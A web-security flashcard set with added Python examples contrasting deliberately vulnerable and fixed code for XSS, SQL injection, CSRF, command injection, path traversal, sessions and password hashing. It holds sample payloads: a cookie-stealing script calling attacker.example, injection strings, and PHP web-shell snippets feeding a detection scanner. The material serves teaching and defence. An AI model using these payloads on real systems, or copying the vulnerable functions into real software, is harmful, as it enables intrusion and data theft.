Pretest 2 Flashcards

1
Q

What is Cross-Site Scripting (XSS)?

A

A vulnerability in which an application includes untrusted input in a page without encoding it, so attacker-supplied script runs in other users' browsers within the vulnerable site's origin. The script can read session cookies and page data, perform actions as the victim, and rewrite page content. The main variants are reflected (payload echoed from the request), stored (payload saved and served to later visitors) and DOM-based (payload handled by client-side script). The primary defence is context-aware output encoding, with a Content Security Policy as a second layer.
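
The contrast between reflecting input and encoding it, as an added example that is not part of the original flashcard set. The comment payload, the `attacker.example` host and all function names are constructed for illustration. It also shows the caveat that encoding is context-specific: `html.escape` is right for element and attribute bodies, but a `javascript:` URL survives it untouched, so `href` values need a scheme allow-list instead.

```python
import html
from typing import Optional
from urllib.parse import urlsplit

# Constructed sample payload (not from the original page): a stored comment that tries to
# send the viewing user's cookies to an attacker-controlled host.
UNTRUSTED_COMMENT = (
    '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
)


def render_comment_vulnerable(comment: str) -> str:
    """Reflects the comment into the page unchanged: the victim's browser runs the <script>."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment: str) -> str:
    """HTML-encodes the markup characters (& < > " ') so the payload is displayed as text."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_attr_safe(value: str) -> str:
    """Attribute context: quote=True also encodes the quote characters, so the value
    cannot close the attribute and append an event handler such as onmouseover=."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def safe_href(url: str) -> Optional[str]:
    """URL context: encoding alone is not enough, because 'javascript:alert(1)' contains no
    HTML metacharacters yet executes when placed in an href. Allow only http(s), then encode."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return None
    return html.escape(url, quote=True)


def contains_live_script(fragment: str) -> bool:
    """Crude marker used only to contrast the two renderers: did a raw <script tag survive?"""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    print(render_comment_vulnerable(UNTRUSTED_COMMENT))
    print(render_comment_safe(UNTRUSTED_COMMENT))
    print(render_attr_safe('" onmouseover="alert(1)'))
    print(safe_href("javascript:alert(document.domain)"))
```

In a real application the encoding belongs in the template engine (auto-escaping on by default), not in hand-written calls; the functions above only make the difference visible.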

2
Q

What is SQL Injection?

A

SQL Injection is a code injection flaw that arises when an application builds a SQL statement by concatenating untrusted input (from a search box, login form, URL parameter, cookie or header) into the query text, so the input is parsed as SQL rather than treated as data. Attackers can bypass authentication, read, modify or delete data, and on some database servers run operating-system commands. The defence is parameterised (prepared) statements, backed by least-privilege database accounts to limit what a successful injection can reach.
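
A runnable illustration of the flaw and its fix against an in-memory SQLite database, added here and not taken from the original page. The user table, its plaintext passwords (kept plain only so the UNION payload has something readable to pull out) and the three attacker inputs are constructed for the example.

```python
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table (sample data, not from the original page).
    Passwords are stored in clear only to keep the exfiltration payload visible."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2"), ("carol", "letmein")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    """Builds the statement by string formatting, so quotes in the input become SQL syntax."""
    query = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return [row[0] for row in conn.execute(query)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    """Parameterised statement: the driver passes the values separately from the SQL text,
    so a quote in the input can only ever match a literal quote stored in the data."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


# Constructed attacker inputs; '--' starts a SQL comment that swallows the rest of the query.
BYPASS = "' OR '1'='1' --"                       # makes the WHERE clause always true
COMMENT_OUT = "alice' --"                         # removes the password check for one user
EXFIL = "' UNION SELECT password FROM users --"   # appends another column to the result

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bypass:    ", login_vulnerable(db, BYPASS, "x"))
    print("vulnerable, comment:   ", login_vulnerable(db, COMMENT_OUT, "wrong"))
    print("vulnerable, exfil:     ", sorted(login_vulnerable(db, EXFIL, "x")))
    print("safe, bypass:          ", login_safe(db, BYPASS, "x"))
    print("safe, real credential: ", login_safe(db, "alice", "s3cret"))
```

The `sqlite3` module refuses stacked statements in `execute()`, so a `'; DROP TABLE users --` payload fails here; other drivers and databases do allow stacking, which is one more reason the fix is parameterisation rather than filtering particular characters.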

3
Q

What is Cross-Site Request Forgery (CSRF)?

A

CSRF is an attack in which a site controlled by the attacker makes the victim's browser send a request to a site where the victim is already authenticated, for example through an auto-submitting form, a crafted link or an image tag. Because the browser attaches the session cookie automatically, the target treats the forged request as the user's own, and state-changing actions such as changing account settings or transferring funds are carried out without the user's intent. Defences: anti-CSRF (synchronizer) tokens the attacker cannot read, SameSite cookie attributes, and Origin/Referer checks.
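
The synchronizer-token defence with an Origin check as a second layer, as an added example that is not part of the original flashcards. The `Request` class, the `bank.example` and `attacker.example` origins and the session store are constructed stand-ins for a web framework; what matters is that the forged request carries the victim's cookie but not the token.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Tuple

SITE_ORIGIN = "https://bank.example"  # hypothetical origin of the protected application


@dataclass
class Request:
    """Minimal stand-in for an incoming HTTP request (constructed for this example)."""
    cookies: Dict[str, str]
    form: Dict[str, str]
    headers: Dict[str, str] = field(default_factory=dict)


def new_session(store: Dict[str, dict], user: str) -> str:
    """Creates a logged-in session with its own random CSRF token."""
    sid = secrets.token_urlsafe(32)
    store[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def transfer_form(store: Dict[str, dict], sid: str) -> str:
    """The genuine page embeds the token; a cross-site page cannot read it (same-origin policy)."""
    token = store[sid]["csrf"]
    return (
        '<form method="POST" action="/transfer">'
        f'<input type="hidden" name="csrf" value="{token}">'
        '<input name="to"><input name="amount"><button>Send</button></form>'
    )


def transfer_vulnerable(store: Dict[str, dict], req: Request) -> Tuple[int, str]:
    """Authenticates by cookie alone: the browser attaches that cookie to any site's form POST."""
    sess = store.get(req.cookies.get("sid", ""))
    if sess is None:
        return 401, "not logged in"
    return 200, f"{sess['user']} sent {req.form['amount']} to {req.form['to']}"


def transfer_safe(store: Dict[str, dict], req: Request) -> Tuple[int, str]:
    """Cookie plus a secret the forger cannot supply. Origin is checked first as an
    independent layer; browsers set it on cross-site POSTs and scripts cannot forge it."""
    sess = store.get(req.cookies.get("sid", ""))
    if sess is None:
        return 401, "not logged in"
    origin = req.headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-site request blocked"
    token = req.form.get("csrf", "")
    # constant-time comparison so the check itself leaks nothing about the token
    if not hmac.compare_digest(token.encode(), sess["csrf"].encode()):
        return 403, "missing or invalid CSRF token"
    return 200, f"{sess['user']} sent {req.form['amount']} to {req.form['to']}"


def forged_request(sid: str) -> Request:
    """What arrives when the victim visits attacker.example: the victim's own session
    cookie, the attacker's form fields, and no token, because the attacker never saw one."""
    return Request(
        cookies={"sid": sid},
        form={"to": "attacker", "amount": "1000"},
        headers={"Origin": "https://attacker.example"},
    )
```

Setting `SameSite=Lax` (or `Strict`) on the session cookie stops the browser from attaching it to most cross-site requests in the first place; the token remains necessary because older clients and some same-site subdomain scenarios fall outside that protection.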

4
Q

What is Command Injection?

A

Command Injection occurs when an application passes untrusted input into a command line that is executed by the server's operating-system shell, so shell metacharacters in the input (;, |, &&, backticks, $(...)) append or replace commands. The result is arbitrary command execution with the privileges of the web server process, leading to data theft, modification, or a foothold on the host. Defence: avoid the shell and pass arguments as an argument vector, validate input against an allow-list, and run the process with minimal privileges.
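
Three versions of a host-lookup helper, as an added example that is not from the original page: shell concatenation, an argument vector without a shell, and the argument vector behind an allow-list. `echo` stands in for the real tool (such as `nslookup`) so the example runs without network access; the payload and the hostname pattern are constructed for illustration.

```python
import re
import subprocess

# Allow-list: a label character first, then letters, digits, dots and hyphens. Rejecting a
# leading '-' also stops the input from being read as an option by the invoked program.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")

# Constructed attacker input: a plausible host followed by a second command.
PAYLOAD = "example.com; echo INJECTED"


def lookup_vulnerable(host: str) -> str:
    """Concatenates input into a line that /bin/sh parses: ';' ends the first command and
    starts the attacker's."""
    result = subprocess.run(
        f"echo resolving {host}", shell=True, capture_output=True, text=True
    )
    return result.stdout


def lookup_argv(host: str) -> str:
    """No shell: the program receives the string as one argv element, so metacharacters are
    plain data. This stops command injection on its own, but not option smuggling."""
    result = subprocess.run(["echo", "resolving", host], capture_output=True, text=True)
    return result.stdout


def lookup_safe(host: str) -> str:
    """Hardened form: allow-list validation in front of the argv call."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"invalid hostname: {host!r}")
    return lookup_argv(host)


if __name__ == "__main__":
    print(lookup_vulnerable(PAYLOAD), end="")
    print(lookup_argv(PAYLOAD), end="")
    print(lookup_safe("example.com"), end="")
```

The same injection exists in any language's `system()`, `popen()` or `exec` helpers when `shell=True` or a single command string is used; the argv form is the fix everywhere, and where a shell is truly unavoidable, `shlex.quote()` each argument rather than escaping by hand.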

5
Q

What is a Man-in-the-Middle (MITM) Attack?

A

A Man-in-the-Middle (MITM) attack occurs when an attacker positions themselves between two communicating parties (e.g., a user and a website) so that traffic passes through them, letting them read, modify, or inject data while both sides believe they are talking directly to each other. Typical positions are a rogue Wi-Fi access point, ARP or DNS spoofing on a local network, or a compromised router or proxy. TLS with proper certificate validation is the main defence, since it authenticates the endpoint and encrypts the traffic.

6
Q

What is Directory Traversal?

A

Directory Traversal (or Path Traversal) is an attack in which input used to build a file path (a URL parameter, cookie or form field) is manipulated with sequences such as ../ (or their URL-encoded forms) so that the application reads or writes files outside the intended directory, for example /etc/passwd, configuration files containing credentials, or application source code. Defence: canonicalise the resulting path and verify it still lies within the permitted base directory, or map the input to an allow-list of file names.
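
A file-serving function with and without the containment check, as an added example not taken from the original page. The directory layout is built in a temporary folder for the demonstration. Two traps are shown: `os.path.join` does not neutralise `..`, and it silently discards the base directory when the user-supplied name is absolute.

```python
import os
import tempfile
from typing import Tuple


def make_tree() -> Tuple[str, str, str]:
    """Constructed layout: <root>/public/hello.txt is meant to be served; <root>/secret.txt is
    not. Returns (root, public, absolute path of the secret)."""
    root = tempfile.mkdtemp()
    public = os.path.join(root, "public")
    os.mkdir(public)
    with open(os.path.join(public, "hello.txt"), "w") as f:
        f.write("hello\n")
    secret = os.path.join(root, "secret.txt")
    with open(secret, "w") as f:
        f.write("TOP SECRET\n")
    return root, public, secret


def read_vulnerable(base: str, name: str) -> str:
    """os.path.join neither removes '..' nor stops an absolute name from replacing base.
    `name` is assumed to be already URL-decoded, as a web framework would deliver it."""
    with open(os.path.join(base, name)) as f:
        return f.read()


def read_safe(base: str, name: str) -> str:
    """Canonicalise (resolving '..' and symlinks), then require the result to stay inside
    base. The check is on the final path, so '../public/hello.txt' is allowed."""
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, name))
    try:
        inside = os.path.commonpath([base_real, target]) == base_real
    except ValueError:  # different drives on Windows
        inside = False
    if not inside:
        raise PermissionError(f"path escapes the document root: {name!r}")
    with open(target) as f:
        return f.read()


if __name__ == "__main__":
    root, public, secret = make_tree()
    print(read_vulnerable(public, "../secret.txt"), end="")
    try:
        read_safe(public, "../secret.txt")
    except PermissionError as exc:
        print("blocked:", exc)
```

Comparing with `commonpath` rather than `startswith` matters: a prefix test would accept `/srv/public_old/secret` as being under `/srv/public`.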

7
Q

What is Clickjacking?

A

Clickjacking is a technique in which an attacker loads the target site in an invisible or disguised iframe on a page they control and positions it so that the user's clicks land on the framed site's buttons while the user believes they are interacting with something else. Because the victim is already logged in to the framed site, those clicks perform real actions, such as changing settings or initiating transactions. Defence: forbid framing by other origins with the Content-Security-Policy frame-ancestors directive, with X-Frame-Options for older browsers.
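
A check that classifies a response's framing protection from its headers, plus the headers a hardened response should carry, as an added example that is not from the original flashcards. The five sample responses are constructed. The precedence rule it encodes (a `frame-ancestors` directive overrides `X-Frame-Options`) and the treatment of `ALLOW-FROM` as unsupported by current browsers are the facts a practitioner needs when auditing.

```python
from typing import Dict

# Constructed responses (not from the page) used to exercise the check.
RESPONSES = {
    "no protection": {"Content-Type": "text/html"},
    "legacy header": {"X-Frame-Options": "DENY"},
    "csp self": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'self'"},
    "csp partner": {"Content-Security-Policy": "frame-ancestors 'self' https://partner.example"},
    "obsolete": {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
}


def framing_policy(headers: Dict[str, str]) -> str:
    """Returns 'deny', 'sameorigin', 'allowlist' or 'unprotected'.
    A CSP frame-ancestors directive takes precedence over X-Frame-Options when both exist."""
    lower = {k.lower(): v for k, v in headers.items()}
    csp = lower.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [s.lower() for s in parts[1:]]
            if not sources or sources == ["'none'"]:   # an empty source list matches nothing
                return "deny"
            if sources == ["'self'"]:
                return "sameorigin"
            return "allowlist"
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return "deny"
    if xfo == "SAMEORIGIN":
        return "sameorigin"
    # ALLOW-FROM was never widely implemented and current browsers ignore it,
    # so a page relying on it is effectively frameable.
    return "unprotected"


def hardened_headers(allow_self: bool = False) -> Dict[str, str]:
    """Headers to emit: CSP for current browsers, X-Frame-Options for older ones."""
    if allow_self:
        return {"Content-Security-Policy": "frame-ancestors 'self'",
                "X-Frame-Options": "SAMEORIGIN"}
    return {"Content-Security-Policy": "frame-ancestors 'none'",
            "X-Frame-Options": "DENY"}


if __name__ == "__main__":
    for label, headers in RESPONSES.items():
        print(f"{label:14s} -> {framing_policy(headers)}")
```

An "allowlist" result is not a finding by itself; it means the listed partner origins can frame the page, which is a design decision to confirm rather than a gap.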

8
Q

What is Session Fixation?

A

Session Fixation is an attack in which the attacker obtains a session ID from the application and plants it in the victim's browser (for example through a URL parameter or an injected cookie) before the victim logs in. If the application keeps that ID across authentication, the attacker already knows the victim's authenticated session ID and can use it to impersonate them. Defence: issue a fresh session ID at login and at any other privilege change, and never accept session IDs from URLs.

9
Q

What is a Denial-of-Service (DoS) Attack?

A

A Denial-of-Service (DoS) attack aims to make a system or service unavailable to its intended users, either by overwhelming it with more traffic or connections than it can handle or by exploiting a weakness that crashes it or exhausts a resource (for example, a single request that triggers very expensive processing or a parser bug that hangs the process).

10
Q

What is Distributed Denial-of-Service (DDoS)?

A

A Distributed Denial-of-Service (DDoS) attack is a DoS attack in which the traffic comes from many sources at once, usually a botnet of compromised machines or abused reflectors. It is harder to mitigate than a single-source DoS because there is no one address to block and the aggregate volume can exceed the target's bandwidth, so filtering typically has to happen upstream (scrubbing services, anycast, rate limiting at the edge).

11
Q

What is Privilege Escalation?

A

Privilege Escalation occurs when a user or process gains higher privileges than were originally assigned. Vertical escalation moves to a more powerful role (a normal user becoming root or administrator); horizontal escalation reaches another user's data or functions at the same level. Common causes are kernel or service vulnerabilities, misconfigured permissions such as writable setuid binaries or scheduled tasks, credentials left in files, and missing authorisation checks in applications.

12
Q

What is Password Cracking?

A

Password Cracking is the process of recovering plaintext passwords from captured password hashes or intercepted authentication data by guessing candidates offline: brute force over all combinations, dictionary and rule-based attacks using common passwords, and precomputed tables against unsalted hashes. Fast, unsalted algorithms such as MD5 or SHA-1 make this cheap, because one pass over a wordlist cracks every user at once; slow, salted password hashes (bcrypt, scrypt, Argon2, PBKDF2) are the defence.
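
The difference between a fast unsalted hash and a slow salted one, shown with a dictionary attack against each. This is an added example, not part of the original flashcards; the wordlist and the three user accounts are constructed, and the iteration count is a parameter so the attack can be run quickly in a demo.

```python
import hashlib
import hmac
import os
from typing import Dict, Iterable, Optional, Tuple

# Constructed wordlist and user table (sample data, not from the original page).
WORDLIST = ["123456", "password", "qwerty", "hunter2", "letmein", "dragon"]
USERS = {"alice": "hunter2", "bob": "hunter2", "carol": "Tr0ub4dor&3"}


def md5_unsalted(password: str) -> str:
    """The weak scheme: fast and unsalted, so equal passwords give equal digests."""
    return hashlib.md5(password.encode()).hexdigest()


def crack_md5_table(digests: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Dictionary attack: hash the wordlist once, then look up every leaked digest in it.
    The cost is one hash per word regardless of how many users leaked."""
    table = {md5_unsalted(w): w for w in wordlist}
    return {user: table.get(d) for user, d in digests.items()}


def pbkdf2_hash(password: str, salt: Optional[bytes] = None,
                iterations: int = 600_000) -> Tuple[bytes, bytes, int]:
    """The stronger scheme: per-user random salt and a deliberately slow derivation.
    600,000 is OWASP's 2023 recommendation for PBKDF2-HMAC-SHA256; a demo may pass less."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest, iterations


def pbkdf2_verify(password: str, salt: bytes, digest: bytes, iterations: int) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)


def crack_pbkdf2(record: Tuple[bytes, bytes, int], wordlist: Iterable[str]) -> Tuple[Optional[str], int]:
    """The same dictionary attack against one salted, slow hash. Returns (password, work),
    where work counts HMAC iterations: each guess costs a full derivation, and the salt
    means nothing can be precomputed or shared between users."""
    salt, digest, iterations = record
    work = 0
    for w in wordlist:
        work += iterations
        if pbkdf2_verify(w, salt, digest, iterations):
            return w, work
    return None, work


if __name__ == "__main__":
    leaked = {u: md5_unsalted(p) for u, p in USERS.items()}
    print("md5 table attack:", crack_md5_table(leaked, WORDLIST))
    record = pbkdf2_hash(USERS["alice"], iterations=10_000)
    print("pbkdf2 attack:", crack_pbkdf2(record, WORDLIST))
```

The unsalted table also leaks structure before any cracking: alice and bob share a digest, so an attacker knows they share a password. With a salt the two records are unrelated, and with the full iteration count each guess costs the attacker the same time it costs the server to verify a login.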

13
Q

What is Subdomain Takeover?

A

Subdomain Takeover happens when a DNS record for a subdomain (typically a CNAME) still points at an external service such as a cloud storage bucket, hosting platform or CDN whose resource has been deleted or was never claimed. Because the provider lets anyone register that name, the attacker claims it and then serves content under the organisation's own subdomain, which can be abused for phishing, stealing cookies scoped to the parent domain, or bypassing origin-based trust. Defence: remove or update DNS records whenever a service is decommissioned, and monitor for dangling records.

14
Q

What is Cross-Site Script Inclusion (XSSI)?

A

Cross-Site Script Inclusion (XSSI) occurs when a site serves user-specific data in a form that is valid JavaScript (a script file that assigns data to global variables, a JSONP endpoint, or historically a bare JSON array) and an attacker's page loads that resource with a script tag. The same-origin policy does not prevent script inclusion, and the browser sends the victim's cookies with the request, so the data becomes readable to the attacker's page. Defences: serve data endpoints as JSON objects with an anti-parsing prefix, require a custom header or POST for them, and use SameSite cookies.

15
Q

What is Remote File Inclusion (RFI)?

A

Remote File Inclusion (RFI) is a vulnerability in which an application passes user input to a file-inclusion function (for example PHP's include or require) without validation, so an attacker can supply a URL and have the server fetch and execute a script hosted elsewhere, typically giving remote code execution. It requires the runtime to allow remote includes (allow_url_include in PHP); the same flaw restricted to local paths is Local File Inclusion (LFI). Defence: never build include paths from input; map input to an allow-list of files.

16
Q

What is a Session Hijacking Attack?

A

Session Hijacking is when an attacker obtains a valid session token or cookie, through sniffing unencrypted traffic, cross-site scripting, malware on the client, or guessing a predictable token, and presents it to the application to impersonate the legitimate user for the rest of that session. Defences: TLS everywhere, Secure/HttpOnly/SameSite cookie attributes, long random tokens, and short idle timeouts that bound how long a stolen token stays useful.
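
One session store that illustrates both card 8 (Session Fixation) and this card (Session Hijacking), as an added example that is not from the original flashcards. The `SessionStore` class and `set_cookie_header` are constructed for the demonstration; the `start()` method deliberately accepts a caller-chosen ID to model an application that honours whatever session ID arrives in the request, which is the precondition for fixation. Rotation at login defeats fixation; the cookie attributes and idle expiry shrink the hijacking window.

```python
import secrets
import time
from typing import Dict, Optional


class SessionStore:
    """In-memory session table, sid -> {user, created, last_seen}. Constructed for this example."""

    def __init__(self, idle_timeout: int = 900):
        self.sessions: Dict[str, dict] = {}
        self.idle_timeout = idle_timeout

    def start(self, sid: Optional[str] = None) -> str:
        """Pre-login session. Accepting a caller-supplied sid models an application that
        honours an ID arriving in the request, which is what a fixation attacker relies on."""
        sid = sid or secrets.token_urlsafe(32)
        now = time.time()
        self.sessions[sid] = {"user": None, "created": now, "last_seen": now}
        return sid

    def login_vulnerable(self, sid: str, user: str) -> str:
        """Keeps the pre-login identifier: whoever planted it now owns an authenticated session."""
        self.sessions[sid]["user"] = user
        return sid

    def login_safe(self, sid: str, user: str) -> str:
        """Rotates the identifier at the privilege change and discards the old one."""
        self.sessions.pop(sid, None)
        new_sid = secrets.token_urlsafe(32)
        now = time.time()
        self.sessions[new_sid] = {"user": user, "created": now, "last_seen": now}
        return new_sid

    def user_for(self, sid: str, now: Optional[float] = None) -> Optional[str]:
        """Resolves a presented cookie. Idle sessions expire, which bounds the useful life
        of a stolen token; `now` is injectable so expiry can be exercised deterministically."""
        sess = self.sessions.get(sid)
        if sess is None:
            return None
        now = time.time() if now is None else now
        if now - sess["last_seen"] > self.idle_timeout:
            del self.sessions[sid]
            return None
        sess["last_seen"] = now
        return sess["user"]

    def logout(self, sid: str) -> None:
        """Server-side invalidation: clearing the browser cookie alone leaves the token valid."""
        self.sessions.pop(sid, None)


def set_cookie_header(sid: str) -> str:
    """Cookie attributes that shrink the hijacking surface: HttpOnly keeps script (XSS) away
    from the value, Secure keeps it off plaintext HTTP, SameSite=Lax stops most cross-site
    sends, and the __Host- prefix binds it to this host with Path=/ and no Domain attribute."""
    return f"__Host-sid={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    store = SessionStore()
    planted = store.start("id-the-attacker-knows")   # fixation: attacker plants this in the victim's browser
    fresh = store.login_safe(planted, "alice")
    print("attacker's id still valid:", store.user_for(planted) is not None)
    print(set_cookie_header(fresh))
```

Rotation also belongs after password changes and step-up authentication, and `logout` must delete the server-side entry: an attacker holding a hijacked token is unaffected by the victim's browser forgetting its cookie.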

17
Q

What is a Zero-Day Attack?

A

A Zero-Day Attack exploits a vulnerability in software or hardware that is unknown to the vendor, or known but not yet patched, so defenders have had "zero days" to fix it. Because no patch or signature exists, it is especially dangerous; mitigation relies on defence in depth, least privilege, and behavioural detection rather than on patching.

18
Q

What is a Security Misconfiguration?

A

Security Misconfiguration occurs when a system, server, or application is deployed with insecure default settings or incomplete hardening: default credentials, unnecessary services or open ports, verbose error messages, directory listing, missing security headers, or overly permissive cloud storage and IAM permissions. Such gaps give attackers a foothold without any software bug being involved.

19
Q

What is a Social Engineering Attack?

A

Social Engineering involves manipulating or deceiving individuals into divulging confidential information, often by impersonating someone they trust. Common examples include phishing and pretexting.

20
Q

What is an API Security Vulnerability?

A

API Security Vulnerabilities are weaknesses in an application's API (Application Programming Interface) that attackers can exploit directly, without going through the user interface. Typical issues are broken authentication, missing object-level authorisation (retrieving another user's record by changing an ID in the request), lack of input validation, excessive data exposure in responses, and missing rate limiting.

21
Q

What is a Phishing Attack?

A

Phishing is a social engineering attack where an attacker impersonates a legitimate entity (such as a bank or email provider) to trick the target into revealing sensitive information like usernames, passwords, or credit card numbers, often via fraudulent emails or websites.

22
Q

What is a DNS Spoofing Attack?

A

DNS Spoofing (or DNS Cache Poisoning) is an attack in which forged DNS responses are injected into a resolver's cache, or sent directly to a client, so that a domain name resolves to an attacker-controlled address. Users are then silently redirected from the legitimate site to a malicious one for phishing, credential theft, or malware distribution. DNSSEC, which signs DNS data so forged answers fail validation, is the main defence.

23
Q

What is a Session Replay Attack?

A

Session Replay is a replay attack against session data: the attacker captures legitimate messages (an authentication exchange, a session token, a signed transaction request) and resubmits them later so that they are accepted again, gaining access or repeating an action without knowing any secret. Defences: nonces, timestamps, sequence numbers, and one-time tokens bound to the session, so that a captured message is valid only once.

24
Q

What is an Insider Threat?

A

An Insider Threat refers to a security threat that originates from within an organization. This can involve employees, contractors, or others with authorized access who intentionally or unintentionally cause harm, such as stealing data or introducing vulnerabilities.

25
Q

What is a Web Shell?

A

A Web Shell is a script (in PHP, ASP.NET, JSP or another server-side language) that an attacker places on a web server, usually after exploiting an unrestricted file upload or remote code execution flaw, in order to keep remote control of it. Requests to the script carry commands that it executes on the host, giving the attacker persistence, a base for lateral movement, and command execution with the web server's privileges.
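
A small signature-based scanner for PHP web shells, as an added example that is not part of the original flashcards. The four sample files and the rule weights are constructed for the demonstration and are not calibrated against real malware. It shows the typical indicators a responder looks for: an execution primitive fed from request data, obfuscation helpers, variable function calls, and file writes to attacker-chosen paths.

```python
import re
from typing import Dict, List

# Constructed samples standing in for files found in a web root (not from the original page).
SAMPLES = {
    "one-liner.php": "<?php @eval($_POST['cmd']); ?>",
    "obfuscated.php": "<?php $f = base64_decode('c3lzdGVt'); $f($_REQUEST['c']); ?>",
    "uploader.php": ("<?php if (isset($_FILES['f'])) "
                     "move_uploaded_file($_FILES['f']['tmp_name'], $_GET['p']); ?>"),
    "contact.php": "<?php $name = htmlspecialchars($_POST['name'] ?? ''); echo 'Thanks, ' . $name; ?>",
}

REQ = r"\$_(GET|POST|REQUEST|COOKIE)"  # PHP superglobals carrying attacker-controlled input

# Each rule: (description, regex, weight). Weights are illustrative, not calibrated.
RULES = [
    ("execution primitive fed from request data",
     re.compile(r"\b(eval|assert|system|shell_exec|exec|passthru|popen|proc_open)\s*\(\s*[^)]*" + REQ, re.I), 5),
    ("execution primitive present",
     re.compile(r"\b(eval|shell_exec|passthru|proc_open|popen)\s*\(", re.I), 2),
    ("obfuscation helper",
     re.compile(r"\b(base64_decode|gzinflate|str_rot13|gzuncompress)\s*\(", re.I), 2),
    ("variable function call on request data",
     re.compile(r"\$\w+\s*\(\s*" + REQ, re.I), 4),
    ("file write to attacker-chosen path",
     re.compile(r"\b(move_uploaded_file|file_put_contents|fwrite)\s*\([^)]*" + REQ, re.I), 4),
    ("error suppression before execution",
     re.compile(r"@\s*(eval|system|shell_exec|passthru)\b", re.I), 1),
]


def score_source(source: str) -> Dict[str, object]:
    """Scores one file's contents and lists the rules that fired."""
    hits = [desc for desc, rx, _ in RULES if rx.search(source)]
    score = sum(w for desc, rx, w in RULES if rx.search(source))
    return {"score": score, "hits": hits, "suspicious": score >= 4}


def scan(files: Dict[str, str], threshold: int = 4) -> List[str]:
    """Returns the names of files scoring at or above the threshold, sorted for stable output."""
    return sorted(name for name, src in files.items() if score_source(src)["score"] >= threshold)


if __name__ == "__main__":
    for name, src in SAMPLES.items():
        result = score_source(src)
        print(f"{name:16s} score={result['score']:<2} hits={result['hits']}")
    print("flagged:", scan(SAMPLES))
```

Pattern matching like this is easily evaded (string concatenation, `chr()` tables, functions resolved at runtime), so in practice it is paired with file-integrity monitoring of the web root and web-server log review, where a script that suddenly starts receiving POST requests, or that never existed in the deployed release, is the stronger signal.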